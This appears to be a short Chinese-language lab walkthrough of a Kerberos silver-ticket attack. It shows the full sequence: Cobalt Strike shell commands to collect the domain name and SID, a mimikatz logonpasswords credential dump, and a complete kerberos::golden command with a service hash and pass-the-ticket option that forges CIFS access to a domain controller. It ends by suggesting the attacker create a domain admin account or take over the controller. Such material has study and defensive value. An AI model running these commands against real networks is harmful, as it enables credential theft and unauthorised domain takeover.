前言
白银票据是利用域的服务账户进行伪造ST,需要一些服务进行交互,比如cifs(共享文件服务)、mysql、sqlserver之类的,所以白银票据是没有黄金票据这么好用的,但是比白银票据更加隐藏一些。
注:限定域环境
复现
1.收集信息
还是加上我们cs上线一台域控和一个普通域内主机
首先我们还是对域控进行收集信息,首先是域名
shell net config workstation
然后查看sid的值
shell whoami /user
然后获取域的hash值,可以从这里直接执行抓取明文密码,或者直接执行命令也是可以的
logonpasswords
然后查看密码凭证,找到我们需要的密码hash值
2.利用
然后来到我们上线的域内普通主机上面,执行下面,需要根据自己需要和内容修改,这里我们普通主机上线的用户是webadmin,所以这里使用webadmin
//删除票据
mimikatz kerberos::purge
//生成白银票据
mimikatz kerberos::golden /user:webadmin /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /target:OWA2010CN-God.god.org /service:cifs /rc4:7e601bfe78bee3f9596ab970b903d614 /ptt
这里我们发现普通主机可以直接访问域控了,接下来的操作看自己了,是创建一个域控用户,还是直接上线域控都可以